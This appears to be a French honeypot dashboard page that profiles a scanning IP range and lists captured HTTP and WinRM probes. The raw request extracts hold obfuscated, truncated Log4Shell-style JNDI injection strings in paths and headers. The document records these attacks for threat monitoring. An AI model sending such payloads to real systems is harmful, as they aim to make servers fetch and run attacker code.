Profil de menace
Activité suspecte — risque 51/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.127.0/24)
Période analysée : 2026-07-01 → 2026-07-31
Activité suspecte — risque 51/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.127.0/24)
Campagne de scan — plusieurs IP du même /24 (34.19.127.0/24, ≥3 pairs)
Activité suspecte — risque 51/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.127.0/24)
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance 64 % — Score WAF 72 · Bonus corrélation +10 · 3 tag(s) WAF
ASN 396982 · 34.19.0.0/17 · ARIN — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 85 événements sur la période pour cette IP.
Même FAI Google LLC — corrélation indicative.
Cette IP touche plusieurs services simulés (pas seulement le web).
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
85 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
85 événement(s) — page 2/2
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 7001 · HTTP | http | Sonde port 7001/TCP port 7001 tcp · via HTTP:7001 · (sonde / probe) · → /${${6nt:ht:6:-j}${2:-n}${bl5:lpas:3cp:-d}${j:-… | Élevée | Moyen · 61 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${6nt:ht:6:-j}${2:-n}${bl5:lpas:3cp:-d}${j:-i}${xc8h:ek1:-:}${42q:nc:m0:-l}${3:rw:bh:-d}${6:-a}$… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${6nt:ht:6:-j}${2:-n}${bl5:lpas:3cp:-d}${j:-i}${xc8h:ek1:-:}${42q:nc:m0:-l}${3:rw:bh:-d}${6:-a}${dv9c:1a9x:n0t:-p}${5:ze7y:-:}${5a84:c:-/}${jsf:wt:-/}${lmbk:o0m:yuq:-P}${42e:-A}${rb:biy:-l}${cg:-0}${bam:g:c:-c}${z:k:ha:--}${${h0:v:-s}${dlf8:pl0b:-y}${c:-s}${sjb:s290:3:-:}${xj:z57n:-j}${m1n:-a}${iom6:1klh:2:-v}${f:-a}${j4:-.}${84g:-v}${3:ax:-e}${m1qj:t:-r}${zx:-s}${qi:-i}${1h3p:-o}${aw84:7:q:-n}}${3k:-.}${jt:v9:-b}${px:1o:g:-d}${6:2:-6}${gs5:zpr8:-a}${2a0:r:-6}${80:-7}${ep3:i:-1}${o7:-e}${wmf8:-d}${l2qk:u
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/${${6nt:ht:6:-j}${2:-n}${bl5:lpas:3cp:-d}${j:-i}${xc8h:ek1:-:}${42q:nc:m0:-l}${3:rw:bh:-d}${6:-a}${dv9c:1a9x:n0t:-p}${5:ze7y:-:}${5a84:c:-/}${jsf:wt:-/}${lmbk…
Preuve honeypot — Sonde port 7001/TCP
Connexion détectée sur le port 7001 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_7001_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 61
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${6nt:ht:6:-j}${2:-n}${bl5:lpas:3cp:-d}${j:-i}${xc8h:ek1:-:}${42q:nc:m0:-l}${3:rw:bh:-d}${6:-a}${dv9c:1a9x:n0t:-p}${5:ze7
Requête brute (extrait)
GET /${${6nt:ht:6:-j}${2:-n}${bl5:lpas:3cp:-d}${j:-i}${xc8h:ek1:-:}${42q:nc:m0:-l}${3:rw:bh:-d}${6:-a}${dv9c:1a9x:n0t:-p}${5:ze7y:-:}${5a84:c:-/}${jsf:wt:-/}${lmbk:o0m:yuq:-P}${42e:-A}${rb:biy:-l}${cg:-0}${bam:g:c:-c}${z:k:ha:--}${${h0:v:-s}${dlf8:pl0b:-y}
|
|||||||
| TCP | 7001 · HTTP | http | Sonde port 7001/TCP port 7001 tcp · via HTTP:7001 · (sonde / probe) | Élevée | Moyen · 48 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
POST / UA ${${f6:1pya:97mi:-j}${8em:0a:c4vj:-n}${u7j:-d}${y9n:xr5n:-i}${t…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
7001
Chemin / cible
/
Preuve honeypot — Sonde port 7001/TCP
Connexion détectée sur le port 7001 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_7001_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 48
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${f6:1pya:97mi:-j}${8em:0a:c4vj:-n}${u7j:-d}${y9n:xr5n:-i}${tzf7:tzp9:-:}${z8w3:-l}${8k6o:5p:-d}${r3vm:1:2r8w:-a}${v0d:i:c:-p}${5xn:tm:fbia:-:}${jtf8:wz:fo7:-/}${zpt:3mb:nck:-/}${hm:z:l:-U}${za:xj:…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1
Host: 62.3.50.33:7001
Accept: */*
User-Agent: ${${f6:1pya:97mi:-j}${8em:0a:c4vj:-n}${u7j:-d}${y9n:xr5n:-i}${t
Requête brute (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:7001 Accept: */* User-Agent: ${${f6:1pya:97mi:-j}${8em:0a:c4vj:-n}${u7j:-d}${y9n:xr5n:-i}${tzf7:tzp9:-:}${z8w3:-l}${8k6o:5p:-d}${r3vm:1:2r8w:-a}${v0d:i:c:-p}${5xn:tm:fbia:-:}${jtf8:wz:fo7:-/}${zpt:3mb:nck:-/}${hm:z:l:-U}
|
|||||||
| TCP | 7001 · HTTP | http | Sonde port 7001/TCP port 7001 tcp · via HTTP:7001 · (sonde / probe) | Élevée | Moyen · 48 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA ${${q4:jm:2:-j}${1wm3:jdei:n3:-n}${6:-d}${9i7j:k09:-i}${q:-:}${…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/
Preuve honeypot — Sonde port 7001/TCP
Connexion détectée sur le port 7001 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_7001_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 48
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${q4:jm:2:-j}${1wm3:jdei:n3:-n}${6:-d}${9i7j:k09:-i}${q:-:}${9:e:-l}${25:-d}${23hs:lqm:-a}${vj:401d:-p}${vs:-:}${e:dx:-/}${m:-/}${b5fo:2l:-U}${4:wt:-A}${w:-l}${n5a:2:-0}${o:s4q:f:-c}${y:0:--}${${w:…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1
Host: 62.3.50.33:7001
Accept: */*
User-Agent: ${${q4:jm:2:-j}${1wm3:jdei:n3:-n}${6:-d}${9i7j:k09:-i}${q:-:}${9
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:7001 Accept: */* User-Agent: ${${q4:jm:2:-j}${1wm3:jdei:n3:-n}${6:-d}${9i7j:k09:-i}${q:-:}${9:e:-l}${25:-d}${23hs:lqm:-a}${vj:401d:-p}${vs:-:}${e:dx:-/}${m:-/}${b5fo:2l:-U}${4:wt:-A}${w:-l}${n5a:2:-0}${o:s4q:f:-c}${y:0:--
|
|||||||
| TCP | 7001 · HTTP | http | Sonde port 7001/TCP port 7001 tcp · via HTTP:7001 · (sonde / probe) | Élevée | Moyen · 49 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/
Preuve honeypot — Sonde port 7001/TCP
Connexion détectée sur le port 7001 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_7001_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 49
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:7001 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:7001 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 X-Forwarded-For: ${${cp:-j}${iz:mna5:-n}${n1w:6mh:els:-d}${bu:a:-i}${tl:q
|
|||||||
| TCP | 5986 · WINRM | winrm | Scan de ports port scan syn · via WINRM:5986 · (reconnaissance) | Élevée | Moyen · 42 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
Émulateur
WINRM
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
5986
Chemin / cible
—
Service
WINRM
Payload
PUT /${${is:1t3:-j}${ej:-n}${g:-d}${yu8:gn:-i}${3w:eym:-:}${6gw:-l}${f6z:92ls:-d}${2q0y:63nb:-a}${9:-p}${zh:e6o7:-:}${w5z:-/}${b
Pourquoi cette classification : Rafale d'authentification SSH · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 42
Confiance : Confiance 100 % — 4 signal(aux) capteur
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
PUT /${${is:1t3:-j}${ej:-n}${g:-d}${yu8:gn:-i}${3w:eym:-:}${6gw:-l}${f6z:92ls:-d}${2q0y:63nb:-a}${9:-p}${zh:e6o7:-:}${w5z:-/}${b
Requête brute (extrait)
PUT /${${is:1t3:-j}${ej:-n}${g:-d}${yu8:gn:-i}${3w:eym:-:}${6gw:-l}${f6z:92ls:-d}${2q0y:63nb:-a}${9:-p}${zh:e6o7:-:}${w5z:-/}${bc7:9ht:-/}${5vhw:-P}${klv:1f:01:-A}${5:-l}${8e:f:vo:-0}${m:hts7:-c}${vph:03g:--}${${gvc:-s}${rgm6:6j:-y}${dvxw:-s}${8jo1:83zf:j7
|
|||||||
| TCP | 5986 · WINRM | winrm | Scan de ports port scan syn · via WINRM:5986 · (reconnaissance) | Élevée | Moyen · 53 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
Émulateur
WINRM
WAF
—
Recommandation
Investiguer
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
5986
Chemin / cible
—
Service
WINRM
Payload
POST /login HTTP/1.1 Host: 62.3.50.33:5986 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Pourquoi cette classification : Rafale d'authentification SSH · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 53
Confiance : Confiance 100 % — 6 signal(aux) capteur
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
User-Agent
—
Règles WAF
—
Payload (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:5986 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Requête brute (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:5986 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Type: application/json Content-Length: 1593 {"username"
|
|||||||
| TCP | 5986 · WINRM | winrm | Scan de ports port scan syn · via WINRM:5986 · (reconnaissance) | Élevée | Moyen · 52 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
Émulateur
WINRM
WAF
—
Recommandation
Investiguer
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
5986
Chemin / cible
—
Service
WINRM
Payload
POST /login HTTP/1.1 Host: 62.3.50.33:5986 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 52
Confiance : Confiance 100 % — 5 signal(aux) capteur
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
User-Agent
—
Règles WAF
—
Payload (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:5986 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Requête brute (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:5986 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Length: 2922 Content-Type: application/x-www-form-urlencod |
|||||||
| TCP | 5986 · WINRM | winrm | Scan de ports port scan syn · via WINRM:5986 · (reconnaissance) | Élevée | Moyen · 42 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
Émulateur
WINRM
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
5986
Chemin / cible
—
Service
WINRM
Payload
GET /${${k:-j}${1:-n}${m:-d}${i:u:-i}${a7np:4pg:mh4:-:}${fa:v4:u:-l}${yr:ro:-d}${dnox:b6s0:kzs:-a}${r3:58w:s47a:-p}${j36v:k2:dle
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 42
Confiance : Confiance 100 % — 3 signal(aux) capteur
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /${${k:-j}${1:-n}${m:-d}${i:u:-i}${a7np:4pg:mh4:-:}${fa:v4:u:-l}${yr:ro:-d}${dnox:b6s0:kzs:-a}${r3:58w:s47a:-p}${j36v:k2:dle
Requête brute (extrait)
GET /${${k:-j}${1:-n}${m:-d}${i:u:-i}${a7np:4pg:mh4:-:}${fa:v4:u:-l}${yr:ro:-d}${dnox:b6s0:kzs:-a}${r3:58w:s47a:-p}${j36v:k2:dle:-:}${t8a3:-/}${95i0:0:-/}${k:-P}${jdg:c3:uo1m:-A}${ybrm:-l}${v8p:7:0:-0}${ovkn:zm4:-c}${9oem:o:--}${${n1:tufz:h2g4:-s}${8n:6o:-
|
|||||||
| TCP | 5986 · WINRM | winrm | Scan de ports port scan syn · via WINRM:5986 · (reconnaissance) | Élevée | Moyen · 42 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
Émulateur
WINRM
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
5986
Chemin / cible
—
Service
WINRM
Payload
ZSDLKFJ2 /${${4qvc:-j}${1f:-n}${9de:zf:xu:-d}${cgb8:gem:e8h:-i}${dz16:4erh:fupd:-:}${dv:wh:-l}${wyo:vm2:o23:-d}${z:-a}${q1c:-p}$
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 42
Confiance : Confiance 100 % — 3 signal(aux) capteur
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
ZSDLKFJ2 /${${4qvc:-j}${1f:-n}${9de:zf:xu:-d}${cgb8:gem:e8h:-i}${dz16:4erh:fupd:-:}${dv:wh:-l}${wyo:vm2:o23:-d}${z:-a}${q1c:-p}$
Requête brute (extrait)
ZSDLKFJ2 /${${4qvc:-j}${1f:-n}${9de:zf:xu:-d}${cgb8:gem:e8h:-i}${dz16:4erh:fupd:-:}${dv:wh:-l}${wyo:vm2:o23:-d}${z:-a}${q1c:-p}${x:0x:icbl:-:}${oi:du:-/}${pr7:fw2:3:-/}${s6n:cgh:-P}${on7f:-A}${tu:rgiv:ze:-l}${r:9c:-0}${ig:9lu:6:-c}${29:9a81:--}${${6kln:a:-
|
|||||||
| TCP | 5986 · WINRM | winrm | Scan de ports port scan syn · via WINRM:5986 · (reconnaissance) | Élevée | Moyen · 42 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
Émulateur
WINRM
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
5986
Chemin / cible
—
Service
WINRM
Payload
GET /${${nvk:2:d8:-j}${6l:j:-n}${wbc:-d}${i:-i}${vpla:8:jqyi:-:}${kif3:-l}${mh6:o:29:-d}${dk:-a}${u49k:d04w:g3:-p}${5:vd:-:}${ye
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 42
Confiance : Confiance 100 % — 3 signal(aux) capteur
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
ET PHP serialize O:
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /${${nvk:2:d8:-j}${6l:j:-n}${wbc:-d}${i:-i}${vpla:8:jqyi:-:}${kif3:-l}${mh6:o:29:-d}${dk:-a}${u49k:d04w:g3:-p}${5:vd:-:}${ye
Requête brute (extrait)
GET /${${nvk:2:d8:-j}${6l:j:-n}${wbc:-d}${i:-i}${vpla:8:jqyi:-:}${kif3:-l}${mh6:o:29:-d}${dk:-a}${u49k:d04w:g3:-p}${5:vd:-:}${yep:-/}${cswf:501:-/}${0:zb:0:-P}${vjrb:g9d:-A}${i0:2u:-l}${u42n:-0}${vsf:-c}${6:3ig:--}${${i:-s}${j:xv7:c:-y}${y:0l:xf:-s}${u0g:-
|
|||||||
| TCP | 5986 · WINRM | winrm | Scan de ports port scan syn · via WINRM:5986 · (reconnaissance) | Élevée | Moyen · 42 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
Émulateur
WINRM
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
5986
Chemin / cible
—
Service
WINRM
Payload
POST / HTTP/1.1 Host: 62.3.50.33:5986 Accept: */* User-Agent: ${${cw:gubt:-j}${2dt:i:qst:-n}${jr:v:-d}${ml:lf3:-i}${2:-:}${g4
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 42
Confiance : Confiance 100 % — 3 signal(aux) capteur
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
POST / HTTP/1.1
Host: 62.3.50.33:5986
Accept: */*
User-Agent: ${${cw:gubt:-j}${2dt:i:qst:-n}${jr:v:-d}${ml:lf3:-i}${2:-:}${g4
Requête brute (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:5986 Accept: */* User-Agent: ${${cw:gubt:-j}${2dt:i:qst:-n}${jr:v:-d}${ml:lf3:-i}${2:-:}${g4:80jn:3ri9:-l}${gr:-d}${bk6:eg:q1wy:-a}${m:pi:8:-p}${3jm1:-:}${e:64h:-/}${me:ext:-/}${7q:-U}${pwm:bd:-A}${ku:-l}${n:75:-0}${6c4:
|
|||||||
| TCP | 5986 · WINRM | winrm | Scan de ports port scan syn · via WINRM:5986 · (reconnaissance) | Élevée | Moyen · 42 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
Émulateur
WINRM
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
5986
Chemin / cible
—
Service
WINRM
Payload
GET / HTTP/1.1 Host: ${${p:nh:-j}${x3b9:8sv:k:-n}${0o1:1sdg:pkot:-d}${t6d0:-i}${fd7:-:}${n0:-l}${dn:-d}${n:l:-a}${2la4:0lfy:-p}
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 42
Confiance : Confiance 100 % — 4 signal(aux) capteur
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
GET / HTTP/1.1
Host: ${${p:nh:-j}${x3b9:8sv:k:-n}${0o1:1sdg:pkot:-d}${t6d0:-i}${fd7:-:}${n0:-l}${dn:-d}${n:l:-a}${2la4:0lfy:-p}
Requête brute (extrait)
GET / HTTP/1.1 Host: ${${p:nh:-j}${x3b9:8sv:k:-n}${0o1:1sdg:pkot:-d}${t6d0:-i}${fd7:-:}${n0:-l}${dn:-d}${n:l:-a}${2la4:0lfy:-p}${u4q3:9qb2:vkdy:-:}${p:rioj:lw:-/}${g:8:-/}${xc:7h:-H}${htu0:-O}${xa:e8wx:2kls:-l}${usn:-0}${ty0g:-c}${qwf6:mun:gj:--}${${g:-s}
|
|||||||
| TCP | 5986 · WINRM | winrm | Scan de ports port scan syn · via WINRM:5986 · (reconnaissance) | Élevée | Moyen · 53 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
Émulateur
WINRM
WAF
—
Recommandation
Investiguer
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
5986
Chemin / cible
—
Service
WINRM
Payload
GET / HTTP/1.1 Host: 62.3.50.33:5986 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 53
Confiance : Confiance 100 % — 5 signal(aux) capteur
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
SSRF Any-address SSRF
User-Agent
—
Règles WAF
—
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:5986 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:5986 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 X-Forwarded-For: ${${p:yu:-j}${xbuz:-n}${7pcq:jen:-d}${mze9:u:5:-i}${zx5:
|
|||||||
| TCP | 5986 · WINRM | winrm | Scan de ports port scan syn · via WINRM:5986 · (reconnaissance) | Élevée | Moyen · 42 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
Émulateur
WINRM
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
5986
Chemin / cible
—
Service
WINRM
Payload
GET / HTTP/1.1 Host: 62.3.50.33:5986 Accept: */* User-Agent: ${${g1:3lg:h:-j}${d9b:d74:ngsf:-n}${ytc:-d}${dx:bg9:-i}${lrtp:e:
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 42
Confiance : Confiance 100 % — 4 signal(aux) capteur
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
GET / HTTP/1.1
Host: 62.3.50.33:5986
Accept: */*
User-Agent: ${${g1:3lg:h:-j}${d9b:d74:ngsf:-n}${ytc:-d}${dx:bg9:-i}${lrtp:e:
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:5986 Accept: */* User-Agent: ${${g1:3lg:h:-j}${d9b:d74:ngsf:-n}${ytc:-d}${dx:bg9:-i}${lrtp:e:-:}${mcb2:egmx:-l}${5giz:2:kgmw:-d}${sv:sc:4:-a}${bl:-p}${4a:g:-:}${4:ykv:esj0:-/}${z80o:s932:l:-/}${z1b:u:-U}${3s0z:-A}${sw:m:-
|
|||||||
